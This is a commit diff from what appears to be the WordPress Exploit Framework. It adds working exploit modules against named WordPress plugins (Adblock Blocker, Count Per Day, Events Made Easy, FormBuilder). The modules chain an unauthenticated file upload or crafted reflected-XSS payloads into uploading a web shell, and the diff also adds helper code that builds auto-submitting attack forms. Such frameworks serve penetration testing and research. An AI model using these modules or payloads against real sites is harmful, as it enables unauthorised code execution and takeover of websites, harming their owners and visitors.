Merged branch development into master

Author: rastating

lib/wpxf/core/data_file.rb

@@ -13,6 +13,12 @@ def php_content
       content.strip.sub(/^<\?php/i, '').sub(/\?>$/i, '')
     end
 
+    # @return [String] the contents of the data file with variable replacements.
+    def content_with_named_vars(vars)
+      matcher = /#{vars.keys.map { |k| Regexp.escape(k) }.join('|')}/
+      content.gsub(matcher, vars)
+    end
+
     # @return the content of the file.
     attr_accessor :content
   end

lib/wpxf/wordpress/staged_reflected_xss.rb

@@ -32,10 +32,39 @@ def url_with_xss
     normalize_uri(xss_url, initial_req_path)
   end
 
+  # @return [String] the initial script that should be served to automate a form submission to the vulnerable page.
+  def initial_script
+    nil
+  end
+
+  # Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.
+  # @param url [String] the vulnerable URL.
+  # @param fields [Hash] the fields and values to inject into the script.
+  def create_basic_post_script(url, fields)
+    json = ''
+    fields.each_with_index do |(k, v), i|
+      if i < fields.size - 1
+        json += "\"#{k}\": \"#{v}\",\n"
+        next
+      end
+
+      json += "\"#{k}\": \"#{v}\"\n"
+    end
+
+    %|
+      <html><head></head><body><script>
+        #{js_post}
+        post('#{url}', {
+          #{json}
+        });
+      </script></body></html>
+    |
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
-    unless respond_to? 'initial_script'
+    if initial_script.nil?
       raise 'Required method "initial_script" has not been implemented'
     end
 

modules/exploits/adblock_blocker_shell_upload.rb

@@ -0,0 +1,39 @@
+class Wpxf::Exploit::AdblockBlockerShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Adblock Blocker Unauthenticated Shell Upload',
+      author: [
+        'White Fir Design',               # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8592'],
+        ['URL', 'https://www.pluginvulnerabilities.com/2016/08/01/arbitrary-file-upload-vulnerability-in-adblock-blocker/']
+      ],
+      date: 'Aug 01 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('addblockblocker')
+  end
+
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'getcountryuser')
+    builder.add_file_from_string('popimg', payload.encoded, payload_name)
+    builder
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, Time.now.strftime('%Y'), Time.now.strftime('%m'), payload_name)
+  end
+end

modules/exploits/count_per_day_reflected_xss_shell_upload.rb

@@ -0,0 +1,38 @@
+class Wpxf::Exploit::CountPerDayReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Count Per Day <= 3.5.4 Reflected XSS Shell Upload',
+      author: [
+        'Yorick Koster',                  # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8597'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_count_per_day_wordpress_plugin.html']
+      ],
+      date: 'Aug 04 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('count-per-day', '3.5.5')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php?page=count-per-day%2Fcounter-options.php')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{vulnerable_url}', {
+        limit: "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><input value=\\\""
+      });
+    </script></body></html>
+    |
+  end
+end

modules/exploits/events_made_easy_reflected_xss_shell_upload.rb

@@ -0,0 +1,109 @@
+class Wpxf::Exploit::EventsMadeEasyReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Events MAde Easy <= 1.6.20 Reflected XSS Shell Upload',
+      author: [
+        'Job Diesveld',                   # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8595'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html']
+      ],
+      date: 'Aug 04 2016'
+    )
+
+    register_option(
+      IntegerOption.new(
+        name: 'event_id',
+        desc: 'A valid event ID (can be found in the URL of an event page)',
+        required: true
+      )
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('events-made-easy', '1.6.21')
+  end
+
+  def event_id
+    normalized_option_value('event_id')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, "admin.php?page=events-manager&eme_admin_action=update_event&event_id=#{event_id}")
+  end
+
+  def initial_script
+    create_basic_post_script(vulnerable_url, form_fields)
+  end
+
+  def form_fields
+    {
+      'event_status' => [1, 2, 5].sample,
+      'event_contactperson_id' => -1,
+      'event_seats' => 0,
+      'price' => 0,
+      'currency' => 'EUR',
+      'eme_prop_max_allowed' => Utility::Text.rand_numeric(2),
+      'eme_prop_min_allowed' => Utility::Text.rand_numeric(1),
+      'eme_prop_rsvp_discount' => '',
+      'eme_prop_rsvp_discountgroup' => '',
+      'rsvp_number_days' => Utility::Text.rand_numeric(1),
+      'rsvp_number_hours' => Utility::Text.rand_numeric(1),
+      'eme_prop_rsvp_end_target' => 'start',
+      'event_name' => Utility::Text.rand_alphanumeric(10),
+      'event_slug' => Utility::Text.rand_alphanumeric(10),
+      'localised_recurrence_date' => Time.now.strftime('%d/%m/%Y'),
+      'recurrence_start_date' => Time.now.strftime('%Y-%m-%d'),
+      'localised_recurrence_end_date' => Time.now.strftime('%d/%m/%Y'),
+      'recurrence_end_date' => Time.now.strftime('%Y-%m-%d'),
+      'recurrence_freq' => ['daily', 'weekly', 'monthly'].sample,
+      'recurrence_interval' => '',
+      'recurrence_byweekno' => 1,
+      'recurrence_byday' => 1,
+      'localised_event_start_date' => Time.now.strftime('%d/%m/%Y'),
+      'event_start_date' => Time.now.strftime('%Y-%m-%d'),
+      'localised_event_end_date' => Time.now.strftime('%d/%m/%Y'),
+      'event_end_date' => Time.now.strftime('%Y-%m-%d'),
+      'event_start_time' => Time.now.strftime('%I:%M%p'),
+      'event_end_time' => Time.now.strftime('%I:%M%p'),
+      'eme_prop_event_page_title_format_tpl' => 0,
+      'event_page_title_format' => Utility::Text.rand_alphanumeric(10),
+      'eme_prop_event_single_event_format_tpl' => 0,
+      'event_single_event_format' => "<script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'eme_prop_event_contactperson_email_body_tpl' => 0,
+      'event_contactperson_email_body' => '',
+      'eme_prop_event_registration_recorded_ok_html_tpl' => 0,
+      'event_registration_recorded_ok_html' => '',
+      'eme_prop_event_respondent_email_body_tpl' => 0,
+      'event_respondent_email_body' => '',
+      'eme_prop_event_registration_pending_email_body_tpl' => 0,
+      'event_registration_pending_email_body' => '',
+      'eme_prop_event_registration_updated_email_body_tpl' => 0,
+      'event_registration_updated_email_body' => '',
+      'eme_prop_event_registration_cancelled_email_body_tpl' => 0,
+      'event_registration_cancelled_email_body' => Utility::Text.rand_alphanumeric(10),
+      'eme_prop_event_registration_denied_email_body_tpl' => 0,
+      'event_registration_denied_email_body' => Utility::Text.rand_alphanumeric(10),
+      'eme_prop_event_registration_form_format_tpl' => 0,
+      'event_registration_form_format' => '',
+      'eme_prop_event_cancel_form_format_tpl' => 0,
+      'event_cancel_form_format' => '',
+      'location_name' => Utility::Text.rand_alphanumeric(5),
+      'location_address' => Utility::Text.rand_alphanumeric(5),
+      'location_town' => Utility::Text.rand_alphanumeric(5),
+      'location_latitude' => '',
+      'location_longitude' => '',
+      'content' => Utility::Text.rand_alphanumeric(10),
+      'event_image_url' => '',
+      'event_image_id' => '',
+      'event_url' => '',
+      'event_update_button' => ''
+    }
+  end
+end

modules/exploits/formbuilder_reflected_xss_shell_upload.rb

@@ -0,0 +1,32 @@
+class Wpxf::Exploit::FormbuilderReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'FormBuilder <= 1.0.5 Reflected XSS Shell Upload',
+      author: [
+        'Peter Ganzevles',                # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8596'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_formbuilder_wordpress_plugin.html']
+      ],
+      date: 'Aug 04 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('formbuilder', '1.06')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'tools.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=formbuilder.php&pageNumber=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E&formSearch=#{Utility::Text.rand_alpha(5)}&Search=Search"
+  end
+end

spec/core/data_file_spec.rb

@@ -14,4 +14,12 @@
       expect(subject.php_content).to_not match(/^<\?php.*\?>^/)
     end
   end
+
+  describe '#content_with_named_vars' do
+    it 'returns the file contents with the specified string replacements' do
+      allow(subject).to receive(:content).and_return('var $name = "$value";')
+      content = subject.content_with_named_vars('$name' => 'foo', '$value' => 'bar')
+      expect(content).to eq('var foo = "bar";')
+    end
+  end
 end